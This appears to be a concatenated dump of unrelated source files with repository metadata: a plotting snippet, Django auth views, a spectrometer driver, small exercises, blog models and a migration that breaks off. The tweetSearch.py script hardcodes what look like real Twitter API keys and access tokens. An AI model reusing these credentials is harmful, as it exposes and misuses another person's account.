plt.errorbar(epochdays,y,xerr=0,yerr=err,fmt='none',ecolor=colors[n])
plt.scatter(epochdays,y,color=colors[n], label=legends[n],marker='.')
dmxp=np.multiply(1000,np.mean(dmx)-dmx)
plt.errorbar(epochdays,dmxp, xerr=0, yerr=dmxerr, fmt='none',ecolor='purple')
plt.scatter(epochdays,dmxp,color='purple',marker='.',label=r'$\overline{DMX}$'+' - DMX')
plt.legend(fontsize=10,loc=1)
plt.title(fullpulsar+ " " +r'$\Delta$'+"DM vs Date of Obs")
plt.xlabel("Day (MJD)")
plt.ylabel(r'$\Delta$'+"DM ($pc$ $cm^{-3}$)"+"x1000")
plt.xlim(epochdays[0]-50,epochdays[-1]+50)
if modes=='Crossband':
plt.ylim(min(dmxp)-.5,max(dmxp)+.5)
else:
plt.ylim(min(dmxp)-1,max(dmxp)+1)
plt.minorticks_on
show() | [
"ggrillo93@gmail.com"
] | ggrillo93@gmail.com |
be7023cfd8e20ca8aa5c7262dc094051426d8610 | 2aace9bb170363e181eb7520e93def25f38dbe5c | /build/idea-sandbox/system/python_stubs/cache/935e39a6b43731383c8ecd4f86063224edc819ebd6d95bfabab328fca05f4912/cython_runtime.py | 37c3804fcd8cb40135e6b055396f17c83e3f5186 | [] | no_license | qkpqkp/PlagCheck | 13cb66fd2b2caa2451690bb72a2634bdaa07f1e6 | d229904674a5a6e46738179c7494488ca930045e | refs/heads/master | 2023-05-28T15:06:08.723143 | 2021-06-09T05:36:34 | 2021-06-09T05:36:34 | 375,235,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # encoding: utf-8
# module cython_runtime
# from C:\Users\Doly\Anaconda3\lib\site-packages\scipy\special\_ellip_harm_2.cp37-win_amd64.pyd
# by generator 1.147
# no doc
# no imports
# Variables with simple values
__loader__ = None
__spec__ = None
# no functions
# no classes
| [
"qinkunpeng2015@163.com"
] | qinkunpeng2015@163.com |
8f0eee98f1cd65697147e3212963288dfcc6e789 | 9a32e96b5acdbed92b5a2b6eb556b9c92c0764fa | /exercises/exercise 5b.py | 5bcfb610bb022d839ccf050d46fef253e35ae892 | [] | no_license | emailman/Simulator_3 | 40d3374a7b70e46d56a7f8a5fd4b028e86acf168 | 5aa42297d9ee533ac1eb79214b2055ee4762a641 | refs/heads/master | 2020-09-22T05:30:25.518192 | 2020-02-15T16:00:43 | 2020-02-15T16:00:43 | 225,067,717 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | from exercises.simulator import GuiApp
class MyUserApp(GuiApp):
    """Exercise 5b: light the lamp whose position matches the clicked button."""
    ALL_LIGHTS = ['red', 'yellow', 'green', 'blue']  # lamp names, indexed by (button number - 1)
    def once(self):
        """One-time setup: set the window title and an author byline."""
        # Set things up here to run once
        self.change_title('Turn on the light corresponding to the button clicked')
        self.change_message('By Eric')
    def loop(self):
        """Periodic callback; this exercise needs no repeated work."""
        # Set things up here to run repeatedly
        pass
    def pb_clicked(self, number):
        """Handle a click on button *number* (1-based): report it and turn the matching lamp on."""
        self.change_message('Button ' + str(number) + ' was clicked')
        self.set_light_state(self.ALL_LIGHTS[number - 1], 'on')
# Start the simulator
MyUserApp().run()
| [
"emailman@dtcc.edu"
] | emailman@dtcc.edu |
8c2b4fefc56bf8e29cff3454b03aa8d303777d83 | c5a7d354d9282ed0b37cbf5f990a84a3d5a64436 | /web-src/accounts/views.py | 6eb5e1eb145ff49f5f168fd2827fa20f4a265c1b | [] | no_license | harshwall/Notebook | 5bb13b50d3314db417b19c99ca73ff778d3b9d92 | 23089a3bc6d4db2c21102b01c841c293dceb92ef | refs/heads/master | 2020-04-18T02:10:08.143243 | 2019-01-20T20:10:57 | 2019-01-20T20:10:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,285 | py | from django.shortcuts import render, redirect
from django.views.generic import TemplateView, View
from django.contrib.auth import authenticate, login, logout, get_user_model
from django.utils.html import strip_tags
from django.contrib import messages
from django.core.validators import validate_email
from django.shortcuts import get_object_or_404
class HomeView(TemplateView):
    """Render the site landing page."""

    def get(self, request):
        # Static title only; no model data is involved.
        return render(request, 'index.html', context={'title': 'home'})
class LoginView(View):
    """Authenticate a user submitted from the home-page login form."""
    def get(self, request):
        # Login is POST-only; direct GETs bounce back to the home page.
        return redirect('home')
    def post(self, request):
        """Validate credentials; on success log the user in, otherwise
        re-render the home page with a flash error message."""
        if request.method == 'POST':
            # Strip any markup from the submitted credentials before use.
            username = strip_tags(request.POST.get('username'))
            password = strip_tags(request.POST.get('password'))
            user = authenticate(username=username, password=password)
            if user is not None:
                print('User found')
                login(request, user)
                return redirect('home')
            else:
                print('Non existing user')
                messages.error(request, 'oops! username or password does not exists!')
        # Fallback: re-render the home page (reached on failed authentication).
        context = {'title': 'Home'}
        return render(request, 'index.html', context=context)
def logout_user(request):
    """End the current session and return to the home page."""
    logout(request)
    return redirect('home')
class RegistrationView(View):
    """Handle user sign-up posted from the home-page registration form."""

    def get(self, request):
        # Registration only happens via POST; direct visits go home.
        return redirect('home')

    def post(self, request):
        """Validate the submitted form and create the user.

        Collects every validation failure into ``error_msg`` and re-renders
        the home page with all of them at once; on success the new user is
        created with a properly hashed password.
        """
        # Local import keeps the module header untouched.
        from django.core.exceptions import ValidationError

        User = get_user_model()

        # Strip any markup from all submitted fields before use.
        username = strip_tags(request.POST.get('username'))
        password = strip_tags(request.POST.get('password1'))
        conf_password = strip_tags(request.POST.get('password2'))
        first_name = strip_tags(request.POST.get('first_name'))
        last_name = strip_tags(request.POST.get('last_name'))
        email = strip_tags(request.POST.get('email'))

        error_msg = []

        # The two password fields must agree.
        if password != conf_password:
            error_msg.append('Passwords do not match')

        # validate_email raises ValidationError on bad input (it does not
        # return a truthy/falsy flag) -- the original crashed on invalid
        # addresses by testing its return value outside a try block.
        if email:
            try:
                validate_email(email)
            except ValidationError:
                error_msg.append('Invalid email')
        else:
            error_msg.append('kindly enter email')

        # Uniqueness checks; .exists() avoids the original bare excepts.
        if User.objects.filter(username=username).exists():
            error_msg.append('Username Already Taken !')
        if User.objects.filter(email=email).exists():
            error_msg.append('Email Already exists!')

        if error_msg:
            return render(request, 'index.html',
                          context={'title': 'error', 'messages': error_msg})

        try:
            user = User.objects.create(username=username, email=email,
                                       first_name=first_name,
                                       last_name=last_name)
            # set_password hashes; never store the raw password.
            user.set_password(password)
            user.save()
            return render(request, 'index.html',
                          context={'messages': ['user created successfully',
                                                'Login to continue']})
        except Exception as e:
            # Surface creation failures to the template instead of crashing.
            return render(request, 'index.html', context={'messages': e})
| [
"rohitraazanand567@gmail.com"
] | rohitraazanand567@gmail.com |
3e887db0012fd95d348ed1d1b493cf4547ef7a32 | 26c8f5c0c29c50566209efdc7e05b6e7454d9e20 | /solutions/40.Combination Sum II.py | 77b3b414809466b79fb434f08a135f9576267283 | [] | no_license | ZhiCheng0326/LeetCode-Practices | b47f1343db5b82693220ade4bf76ada0e79eba13 | 9ebffde8fdd1038a3e4b763f65e4b6ef58281e79 | refs/heads/main | 2023-08-24T05:25:24.423627 | 2021-10-02T11:14:50 | 2021-10-02T11:14:50 | 327,869,051 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | class Solution:
def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:
candidates.sort()
ans = []
def backtrack(path, choices, cur_sum):
for ind, c in enumerate(choices):
# avoid duplicate answer
if ind-1 >= 0 and choices[ind-1] == choices [ind]: continue
# make choices
path.append(c)
cur_sum += c
# pruning
if cur_sum > target:
cur_sum -=c
path.pop()
return
elif cur_sum == target:
ans.append(path[:])
cur_sum -=c
path.pop()
return
# backtracking
backtrack(path, choices[ind+1:], cur_sum)
# revert
cur_sum -=c
path.pop()
backtrack([], candidates, 0)
return ans
| [
"zhichenglee97@gmail.com"
] | zhichenglee97@gmail.com |
097c22b3ba2d42fc913c97b1d532bd33763b4d2f | 96325a6b827816f2bdf800d5357e4edd11c9ec23 | /py_files/dataregister.py | 5527e7db0810941700c72d15eeb68d359ade42c0 | [] | no_license | prakirt/Multicycle_RISC_Processor | 24c60c865a4f434737022ec10d69270755f9e9ff | c4394aa9ceb0e60873429f8715e87ff06e42358f | refs/heads/master | 2021-06-09T15:25:21.415963 | 2016-12-05T16:41:26 | 2016-12-05T16:41:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | #import math
file_de = open("tracefile_dataregister.txt", "w")
k=0
d = 0
for i in xrange(0,2**10):
k = 1-k
file_de.write('{0:01b}'.format(k))
file_de.write(' ')
file_de.write('{0:016b}'.format(i))
file_de.write(' ')
file_de.write('{0:016b}'.format(d))
file_de.write("\n")
if k==1 :
d = i
file_de.close()
| [
"prakirt2203@gmail.com"
] | prakirt2203@gmail.com |
3c7f3313ec6b47c8cae77a82be48002ac201189d | fb4e64ebc1dc66335f25eaa63bf602fdd9ebd817 | /app/irsystem/models/helpers.py | 701f17912f15e0b96143a68d7bc4659608586904 | [] | no_license | mahin-mac568/Game-Recommender | bb90880d05dfb9ef41dc84f3982b07f8c1cc4c71 | b3e5477b86646781fa22c7b9d8f903ea2ffe18af | refs/heads/main | 2023-07-14T12:18:16.762938 | 2021-08-22T22:15:48 | 2021-08-22T22:15:48 | 398,303,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | # Methods to compose HTTP response JSON
from flask import jsonify
import base64
import json
import numpy as np
def http_json(result, bool):
    """Attach the success flag to *result* and serialize it with jsonify."""
    result["success"] = bool
    return jsonify(result)
def http_resource(result, name, bool=True):
    """Wrap *result* under data/<name> and emit it as a JSON response."""
    return http_json({"data": {name: result}}, bool)
def http_errors(result):
    """Emit schema validation errors as a failed JSON response."""
    return http_json({"data": {"errors": result.errors["_schema"]}}, False)
class NumpyEncoder(json.JSONEncoder):
    """JSON encoder that serializes numpy arrays as base64-wrapped dicts.

    An ndarray becomes ``{"__ndarray__": <b64 str>, "dtype": ..., "shape": ...}``
    so it can round-trip through ``json_numpy_obj_hook``.
    """

    def default(self, obj):
        if isinstance(obj, np.ndarray):
            # Guarantee a C-contiguous buffer before encoding its raw bytes.
            if obj.flags['C_CONTIGUOUS']:
                obj_data = obj.data
            else:
                cont_obj = np.ascontiguousarray(obj)
                assert cont_obj.flags['C_CONTIGUOUS']
                obj_data = cont_obj.data
            # decode(): b64encode returns bytes, which json cannot serialize
            # (the original stored bytes and failed under Python 3).
            data_b64 = base64.b64encode(obj_data).decode('ascii')
            return dict(__ndarray__=data_b64,
                        dtype=str(obj.dtype),
                        shape=obj.shape)
        # Delegate to the base implementation, which raises TypeError for
        # unsupported types.  The original called json.JSONEncoder(self, obj),
        # constructing an encoder instead of invoking default().
        return json.JSONEncoder.default(self, obj)
def json_numpy_obj_hook(dct):
    """Rebuild an ndarray from a dict produced by the companion encoder.

    Any value without the '__ndarray__' marker is passed through untouched,
    so this can be used as a json.loads object_hook.
    """
    if not (isinstance(dct, dict) and '__ndarray__' in dct):
        return dct
    raw = base64.b64decode(dct['__ndarray__'])
    return np.frombuffer(raw, dct['dtype']).reshape(dct['shape'])
| [
"mac568@cornell.edu"
] | mac568@cornell.edu |
cf33a939113ba50e04343dea146fe5038258eddf | 67a5295569a0810ae8e7082d661fce5d37b02cf9 | /listas2.py | 29e892186ad578936b01764a1c9156a7c4626792 | [] | no_license | thiagoabreu93/ed-not-2021-2 | e4b6ca8a42a0b464ad73de5555e2ccda825ca875 | 4b4b3e077c0cf86ed564b502f69854205cbc7ac2 | refs/heads/master | 2023-07-16T03:24:06.627160 | 2021-09-02T23:29:04 | 2021-09-02T23:29:04 | 391,197,856 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # range(): gera uma faixa de números
# range() com 1 argumento: gera uma lista de números
# que vai de zero até argumento - 1
for i in range(10):
print(i)
print('------------------------')
# range() com 2 argumentos: gera uma lista de números começando pelo primeiro argumento (inclusive) até o segundo argumento (exclusive)
for j in range(5, 15):
print(j)
print('-------------------------')
# range() com três argumentos:
# 1º: limite inferior (inclusive)
# 2º: limite superior (exclusive)
# 3º: passo (de quanto em quanto a lista irá andar)
for k in range(1, 22, 3):
print(k)
print('-------------------------')
for n in range(10, 0, -1):
print(n)
| [
"thiago.abreu3@fatec.sp.gov.br"
] | thiago.abreu3@fatec.sp.gov.br |
cb8c2b2d2312bb6962eeed0a36a04d06b423f648 | a12b4bd6176ab2a9bf84c919d5cdbed7e8e42a20 | /shared/common_response.py | fdafb69c8f517c3bd2674420cc0b9e5e79647e77 | [] | no_license | tsrnd/dp-world-tour | b3f82dde21faf2fa3a0cc9bd8cca23994e70b4c7 | 9fd8d4e9c40aa372bf89db05f82cf28043e9020e | refs/heads/master | 2020-04-15T20:14:21.659086 | 2019-02-15T06:46:44 | 2019-02-15T06:46:44 | 164,984,114 | 0 | 0 | null | 2019-02-20T04:36:34 | 2019-01-10T03:37:38 | JavaScript | UTF-8 | Python | false | false | 298 | py | ValidateResponse = {
"message": "validation error",
"fields": "",
}
NotFoundResponse = {
"message": "404 Not Found",
}
InternalResponse = {
"message": "Internal server response",
}
ForbiddenResponse = {
"message": "You have not permission to access this content currently"
}
| [
"hung.nguyen@asiantech.vn"
] | hung.nguyen@asiantech.vn |
87484608d3e765293a94a2c87f82b381dcf74eb5 | 19e898ab83801d32c732d191d30db61c785342ad | /tweetSearch.py | a4d62222af1eb53a4ea200f49e0c16cec4075768 | [] | no_license | rchen27/htechLab4 | 5c1b80c12ab260d3f5453d44d48ee51a3260f3f6 | 7fb7c93784efe5cf6c34b00189052f2d57448d74 | refs/heads/master | 2021-01-10T05:03:55.865590 | 2016-01-21T18:18:14 | 2016-01-21T18:18:14 | 47,301,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | from TwitterSearch import *
try:
tso = TwitterSearchOrder()
#tso.set_keywords(['suffering', 'depression', 'I', 'my'])
tso.set_keywords(['the', 'a'])
tso.set_language('en')
tso.set_include_entities(False)
ts = TwitterSearch(
consumer_key = '1kj4GBRevJITV4S40kLXGHVG2',
consumer_secret = 'c80dJF41IwQV2G4ynR8VYblMQU15M4bc8OFg3aG6l8Y0aoSFhU',
access_token = '1708110452-e3unR8gR7WRMGDoCh3aZutMPL3bFBLFlqHz8tzy',
access_token_secret = 'kkiZDDp8KXLB8cRDwsMqBDc5IxqiaVXSmbQ2XtZEij0tl'
)
for tweet in ts.search_tweets_iterable(tso):
print tweet['user']['screen_name']
except TwitterSearchException as e: # take care of all those ugly errors if there are some
print(e) | [
"rc554@cornell.edu"
] | rc554@cornell.edu |
e86009b41457fd75b15ddc6028526a9d5f76d72b | 53271a00951b50fe33daf1cdd6e3f8eaa3c50cee | /Database2.py | 728cc6c97994f72a55111353b6f608a9aefc24e2 | [] | no_license | shohagrana64/cse716-ddbms-project | 29139a361331bb997fa1cb6efa1a863a2d7d51f6 | 5726cdd5e68c707e1c8fd4051e18f3a93e586380 | refs/heads/main | 2023-08-03T12:14:39.324121 | 2021-09-25T17:10:48 | 2021-09-25T17:10:48 | 410,208,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | import sqlite3
conn = sqlite3.connect('database2_new.db')
c = conn.cursor()
print("Connection Opnend!")
print("reading commands!\n\n")
fd = open('database_latest.sql', 'r')
sqlFile = fd.read()
fd.close()
# all SQL commands (split on ';')
sqlCommands = sqlFile.split(';')
# Execute every command from the input file
value = 0
print("excecuting Commands\n\n")
for command in sqlCommands:
command = command + ';'
print(command)
c.execute(command)
value = value + 1
conn.commit()
conn.close()
print("closed connection")
| [
"shohagrana64@gmail.com"
] | shohagrana64@gmail.com |
7953cb9444df85fce62f70ac70bc0aeea294fb21 | f5e9f3f69094da603a5197824b6da894d79726fa | /thorlabs/spectrometer/CCS.py | 2e1be7add39f2b442be6fcf07b6ea5f143171fe2 | [] | no_license | 7joseph/pylabinstrument | 5c57225ab819417d28c8081cfef6578b975236f8 | 154240ce5ab4337129c7b118a32d97f2d080a46e | refs/heads/master | 2023-01-19T23:24:20.606216 | 2020-11-27T18:16:26 | 2020-11-27T18:16:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,761 | py | from ctypes import (
byref
)
import ctypes
from ...ctools import _visa_enum as enum
from .tools import _TLCCS_wrapper as K
from ..templates.VisaObject import VisaObject
from visa import constants as vicons
from time import sleep
import numpy as np
SCANNING = 1
PIX_NUM = 3648
class CCS(VisaObject):
    '''
    Driver for a Thorlabs CCS-series compact spectrometer (TLCCS library).

    Provides session management, integration-time control and spectrum
    acquisition for a single device identified by its VISA resource name.
    '''

    def __init__(self, resourceName, modelName='', name=''):
        super().__init__(resourceName, modelName, name)
        self.library = K                 # TLCCS wrapper module
        self.integrationTime = 0.01      # seconds; pushed to hardware in open()
        self.averageNumber = 5           # sweeps averaged by sweepAvg()
        self.pixel_num = PIX_NUM         # 3648 pixels on the CCS line sensor

    @property
    def averageNumber(self):
        # Number of sweeps averaged by sweepAvg().
        return self._averageNumber

    @averageNumber.setter
    def averageNumber(self, value):
        self._averageNumber = value

    @property
    def integrationTime(self):
        # Cached detector integration time in seconds (see setIntegrationTime).
        return self._integrationTime

    @integrationTime.setter
    def integrationTime(self, value):
        self._integrationTime = value

    @property
    def library(self):
        return self._library

    @library.setter
    def library(self, value):
        self._library = value

    #############################################################

    def open(self):
        """
        Initialize the instrument driver and perform initialization actions
        (according to the Thorlabs TLCCS library).

        Returns the VISA status code on success; raises on failure.
        """
        self.verboseMessage('Establishing session...')
        idquery = enum.ViBoolean()
        resetDevice = enum.ViBoolean()
        instrumentHandle = enum.ViSession()
        status = self.library.Open(self.resourceName_c, idquery, resetDevice,
                                   byref(instrumentHandle))
        if status == vicons.VI_SUCCESS:
            self.verboseMessage('Done establishing session.')
            self.instrumentHandle = instrumentHandle
            self.idQuery = idquery
            self.resetDevice = resetDevice
            # Push the cached integration time to the hardware.
            self.setIntegrationTime(self.integrationTime)
        else:
            # BUGFIX: the original message had two '{}' placeholders but only
            # one format() argument, so building it raised IndexError instead
            # of the intended exception.
            raise Exception('Failed to establish session with device. '
                            'Error code: {}.'.format(status))
        return status

    def close(self):
        """Close the VISA session (no-op when no session is open)."""
        if self.isInSession:
            self.verboseMessage('Closing session...')
            status = self.library.Close(self.instrumentHandle)
            if status == vicons.VI_SUCCESS:
                self.verboseMessage('Done closing session.')
                self.idQuery = None
                self.resetDevice = None
                self.instrumentHandle = None

    def getStatus(self):
        """
        Return the device status word as a plain int, or None when the
        library call fails.  Raises when no session is open.
        """
        if self.isInSession:
            dstatus = ctypes.c_int32()
            status = self.library.GetDeviceStatus(self.instrumentHandle, byref(dstatus))
            if status == vicons.VI_SUCCESS:
                # BUGFIX: return the integer value rather than the raw
                # ctypes.c_int32 object (which never compares equal to an int).
                return dstatus.value
        else:
            raise self.notInSessionMsg()

    def sweep(self, avgN=1, waitTime=0):
        """
        Acquire avgN spectra.

        avgN -- number of scans to acquire
        waitTime -- time in seconds to wait between consecutive scans

        Returns (datas, wl): an (avgN, 3648) float array of raw intensities
        and the wavelength axis from getWavelength().
        """
        if self.isInSession:
            self.verboseMessage('Sweeping {} time(s)...'.format(avgN))
            # NOTE: np.float was removed in NumPy 1.24; builtin float is the
            # equivalent (float64) dtype.
            datas = np.zeros((avgN, 3648), dtype=float)
            for i in range(avgN):
                status = self.library.StartScan(self.instrumentHandle)
                sleep(0.1)
                # BUGFIX: the original tested `self.getStatus == 1`, comparing
                # the bound method object itself to 1 (always False), so the
                # wait-for-scan loop never ran.
                while self.getStatus() == SCANNING:
                    sleep(0.1)
                data = (ctypes.c_double * 3648)()
                status = self.library.GetScanData(self.instrumentHandle, data)
                datas[i] = np.ctypeslib.as_array(data)
                if waitTime > 0:
                    sleep(waitTime)
            wl = self.getWavelength()
            self.verboseMessage('Done sweeping {} time(s).'.format(avgN))
            return (datas, wl)
        else:
            raise self.notInSessionMsg()

    def sweepAvg(self):
        """Sweep averageNumber times; return (mean spectrum, wavelengths)."""
        if self.isInSession:
            (datas, wl) = self.sweep(self.averageNumber, waitTime=0)
            return (np.mean(datas, axis=0), wl)
        else:
            raise self.notInSessionMsg()

    def getWavelength(self, dataset=0):
        """
        Return the wavelength for each of the 3648 pixels.

        dataset -- 0 for the factory calibration, 1 for user-defined data.
        """
        # BUGFIX: the original asserted `data == 1`, referencing a variable
        # that does not exist at this point; the intent was to validate the
        # `dataset` argument.
        assert dataset == 0 or dataset == 1, 'Accept only 0 (factory setting) or 1 (user defined).'
        if self.isInSession:
            data = (ctypes.c_double * 3648)()
            minWL = ctypes.c_double()
            maxWL = ctypes.c_double()
            status = self.library.GetWavelengthData(self.instrumentHandle,
                                                    ctypes.c_int16(dataset),
                                                    data, byref(minWL), byref(maxWL))
            if status == vicons.VI_SUCCESS:
                return np.ctypeslib.as_array(data)
        else:
            raise self.notInSessionMsg()

    def getIntegrationTime(self):
        """
        Return the integration time in seconds (also refreshes the cached
        self.integrationTime).
        """
        if self.isInSession:
            time = ctypes.c_double()
            status = self.library.GetIntegrationTime(self.instrumentHandle, byref(time))
            if status == vicons.VI_SUCCESS:
                self.integrationTime = time.value
                return time.value
            else:
                raise Exception('Failed to get integration time')
        else:
            raise self.notInSessionMsg()

    def setIntegrationTime(self, sec):
        """
        sec -- integration time in seconds (device accepts 1e-5 .. 6 s)
        """
        assert 1e-5 <= sec <= 6, 'Integration time must be between 1e-5 to 6 seconds.'
        if self.isInSession:
            self.verboseMessage('Setting integration time...')
            status = self.library.SetIntegrationTime(self.instrumentHandle, ctypes.c_double(sec))
            if status == vicons.VI_SUCCESS:
                self.verboseMessage('Done setting integration time.')
                self.integrationTime = sec
            else:
                raise Exception('Failed to set integration time.')
        else:
            raise self.notInSessionMsg()
| [
"psk.light@gmail.com"
] | psk.light@gmail.com |
aa7bdd53cc66e167cb8bf02a2be09310a99dd9f7 | 3c7ece5a516bd79c0ca8a5ecb2722119ed8f4dc9 | /Lesson_19_django2/pizza_project_ETALON/env/Scripts/django-admin.py | fecee6cf6ca80854173cead8c151345dbdae093a | [] | no_license | Bariss77/Lesson_PYTHON | 7340b2a4f8f43090b5bd8f0469230c53e9eaf306 | c90c88e13701a950d0f777858149f9bbdf9f1f9a | refs/heads/master | 2020-04-08T19:19:41.598888 | 2018-12-01T20:47:01 | 2018-12-01T20:47:01 | 158,188,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | #!c:\users\boris\desktop\pizza_project\env\scripts\python.exe
# Minimal `django-admin` entry-point script: hands sys.argv straight to
# Django's management command dispatcher.
from django.core import management

if __name__ == "__main__":
    management.execute_from_command_line()
| [
"37667717+Bariss77@users.noreply.github.com"
] | 37667717+Bariss77@users.noreply.github.com |
67f5c55631f312db567588bced798fff06c0dce3 | dbdc5835bd2e7c5dd924f35cdf4f66962ff2d59f | /Section-2/Simple_Linear_Regression/venv/bin/rst2html4.py | 78fc2e656b9c52a7d0a1f0b488d9c2f0fb9f47bf | [] | no_license | nikhilkumar9687/ML_code_in_Python | cdf0aafbb04b93bcefedd1350a5fe346c16ba147 | 692a43913113a6220aa6a909d83324e479757082 | refs/heads/master | 2022-10-06T12:58:36.029058 | 2020-06-08T20:25:19 | 2020-06-08T20:25:19 | 266,406,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | #!/home/nikhil/Desktop/Machine+Learning+A-Z+(Codes+and+Datasets)/My_Code/Section-2/Simple_Linear_Regression/venv/bin/python
# $Id: rst2html4.py 7994 2016-12-10 17:41:45Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.

"""
A minimal front end to the Docutils Publisher, producing (X)HTML.

The output conforms to XHTML 1.0 transitional
and almost to HTML 4.01 transitional (except for closing empty tags).
"""

# Best-effort: apply the user's default locale so docutils can localize
# output where applicable.
try:
    import locale
    locale.setlocale(locale.LC_ALL, '')
except:
    # NOTE(review): bare except deliberately swallows any locale failure so
    # the converter still runs; narrowing to locale.Error would be safer.
    pass

from docutils.core import publish_cmdline, default_description

description = ('Generates (X)HTML documents from standalone reStructuredText '
               'sources. ' + default_description)

# Entry point: parse command-line args, read the reST source, write HTML4.
publish_cmdline(writer_name='html4', description=description)
| [
"kumar.nikhil9687@gmail.com"
] | kumar.nikhil9687@gmail.com |
0220d3837c405599a30e3ed23a1e342c7630735f | ee3e2a327a70a2800c8d2d54b5aaa1bb14e2d61f | /hc/blog/models.py | c021d9283012bab9a4ed9b2109d061240dbca7b5 | [
"BSD-3-Clause"
] | permissive | skapeyi/healthchecks | bdb1b693df1060391e633bc3e0b38e417bdaf89b | 286baa0e1b7a3ecf554c8785c4aa3dd77a9d9a4d | refs/heads/master | 2020-03-18T22:56:26.854718 | 2018-06-05T06:39:13 | 2018-06-05T06:39:13 | 135,373,769 | 0 | 0 | null | 2018-05-30T01:54:13 | 2018-05-30T01:54:13 | null | UTF-8 | Python | false | false | 1,092 | py | from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.db.models import permalink
class Category(models.Model):
    # A blog category; `slug` is the URL-safe identifier shown in links.
    title = models.CharField(max_length=100)
    slug = models.SlugField(max_length=100)

    def __str__(self):
        return self.title

    @permalink
    def get_absolute_url(self):
        # NOTE(review): reverses the 'view_blog_post' view with this
        # category's slug — appears to reuse the post URL pattern; confirm.
        # (django.db.models.permalink is removed in modern Django.)
        return ('view_blog_post', None, {'slug': self.slug})
class Post(models.Model):
    # A single blog post; `slug` is unique and used to build the post URL.
    title = models.CharField(max_length=254, unique=True)
    slug = models.SlugField(max_length=100, unique=True)
    text = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on every save
    published = models.BooleanField(default=False)
    published_date = models.DateTimeField(blank=True)
    # NOTE(review): ForeignKey without on_delete only works on Django < 2.0;
    # on_delete is a required argument from 2.0 onwards.
    user = models.ForeignKey(User, blank=True, null=True)
    category = models.ForeignKey(Category, blank=True)

    def __str__(self):
        return self.title

    @permalink
    def get_absolute_url(self):
        # Reverse the 'view_blog_post' URL for this post's slug.
        # (django.db.models.permalink is removed in modern Django.)
        return ('view_blog_post', None, {'slug': self.slug})
| [
"skapeyi@bitbucket.org"
] | skapeyi@bitbucket.org |
6f819961c414aac55a990e2f55d591fa7021693d | ffd6bc549caad10ee99ed20a13b0dac51393f24a | /audioTrackExtractor/downloader/downloader.py | fff7a0bb5dc4cf817bbd645d3a8eadbac55da9a6 | [] | no_license | giovaninppc/MC030 | 52a579290e0dcd1d28744f9ac98f49a8857ae275 | 382a60e330f1cdbb82fa8648029fa410db6a5cf5 | refs/heads/master | 2022-12-14T19:53:49.604330 | 2022-09-13T16:53:12 | 2022-09-13T16:53:12 | 208,359,198 | 2 | 0 | null | 2022-12-11T08:42:36 | 2019-09-13T22:56:44 | Python | UTF-8 | Python | false | false | 539 | py | import sys
from pytube import YouTube
class PytubeDownloader():
    """Downloads YouTube videos via the pytube library."""

    def downloadVideo(self, url: str, outputFilename='temp'):
        """Fetch the first MP4 stream of *url* and save it as *outputFilename*."""
        video = YouTube(url)
        print(video)
        # Pick the first available stream whose container format is MP4.
        mp4_stream = video.streams.filter(mime_type='video/mp4').first()
        mp4_stream.download(filename=outputFilename)
stream.download(filename = outputFilename)
if __name__ == "__main__":
videoURL = sys.argv[1]
outputPath = sys.argv[2]
downloader = PytubeDownloader()
downloader.downloadVideo(videoURL, outputFilename = outputPath)
| [
"giovani.x.pereira@gmail.com"
] | giovani.x.pereira@gmail.com |
63b3181bdc60301fadd00b58d77e60a6de34be81 | 5805ef6884e64d715d71a495f6295b317bcb545c | /007.py | 8b23fd87158641054a1e995a081099c41e25f035 | [] | no_license | simonhessner/projecteuler | 9fac0a91b3f30809353bf45850391d916d413ca2 | 3b734a2b6f7f503909cce9528305afa275e53252 | refs/heads/master | 2021-09-07T23:48:51.228556 | 2018-03-03T15:14:51 | 2018-03-03T15:14:51 | 113,055,169 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | #!/usr/bin/python3
# https://projecteuler.net/problem=7
import math
def primes(number):
    """Yield every prime >= number in increasing order (infinite generator)."""
    candidate = number - 1
    while True:
        candidate += 1
        if is_prime(candidate):
            yield candidate
def is_prime(number):
    """Return True iff `number` is a prime.

    Works for any integer: values below 2 (0, 1 and negatives) are not
    prime.  Even numbers other than 2 are rejected up front, so trial
    division only tests odd divisors up to sqrt(number).
    """
    # BUGFIX: guard values < 2 first — the original fell through to
    # math.sqrt() for negative odd inputs and raised a math domain error.
    if number < 2:
        return False
    if number == 2:
        return True
    if number % 2 == 0:
        return False
    for div in range(3, int(math.sqrt(number)+1), 2):  # skip even divisors
        if number % div == 0:
            return False
    return True
# Project Euler #7: find the 10001st prime.
# Improvement: reuse one generator instead of constructing a fresh primes()
# generator (and discarding its state) on every iteration, as the original did.
prime_gen = primes(1)
for i in range(10001):
    prime = next(prime_gen)
print(prime)
"uldci@student.kit.edu"
] | uldci@student.kit.edu |
8ec13516a554596ee1f695900c29653ca4ca824a | 76c3d64fc39112fb78b14e381b7df39741534e69 | /reviews/migrations/0003_auto_20210122_1432.py | eef2ccf58ab56204b7978815bd58296e780990f0 | [] | no_license | MunnazzahAslam/newsreel | 1c10d78dfa4465aad08a71c0ec88f905c59b05ae | 43bfc524ba08675363b2a0db9788827ad9e2cfe6 | refs/heads/main | 2023-03-30T16:18:43.330509 | 2021-04-07T19:43:07 | 2021-04-07T19:43:07 | 355,568,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | # Generated by Django 3.1.5 on 2021-01-22 14:32
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
